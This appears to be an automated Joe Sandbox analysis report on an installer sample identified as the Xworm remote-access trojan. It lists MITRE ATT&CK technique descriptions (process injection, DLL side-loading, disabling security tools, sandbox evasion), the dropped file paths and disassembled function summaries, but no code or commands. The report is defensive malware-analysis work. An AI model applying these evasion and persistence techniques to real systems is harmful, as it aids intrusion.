Instruction Fuzzy Hash: A0014F398452058BCF389F62C45866DB3F5EF14311F2488ADE06956661CF308A81CB11

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 103__Installer.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_103__Installer.e_543e9b5bf1d99de7872b8c34a610dcac6fe4_9792b471_b8d55630-627c-4954-8814-5f2f94326423\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5186.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER535C.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER537C.tmp.xml

C:\Users\Public\Downloads\ind.jpg

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\103[1].ccp

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Windows Analysis Report
103__Installer.exe

Function 00B711E1 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 89
filesleepmemoryCOMMON

Function 00B72E42 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 71
networkfileCOMMON

Function 00B72E3D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 64
networkfileCOMMON

Function 03ABFFE7 Relevance: 7.6, APIs: 5, Instructions: 90
memorylibraryCOMMON

Function 00B72964 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 136
COMMON

Function 03AC00CD Relevance: 6.1, APIs: 4, Instructions: 90
memoryCOMMON

Function 00B72F22 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 23
memoryCOMMON

Function 03ABFB37 Relevance: 3.2, APIs: 2, Instructions: 216
memorylibraryCOMMON

Function 00B75902 Relevance: 3.0, APIs: 2, Instructions: 32
COMMONLIBRARYCODE

Function 05F875E0 Relevance: 1.6, APIs: 1, Instructions: 130
COMMON

Function 00B71830 Relevance: 1.6, APIs: 1, Instructions: 78
COMMON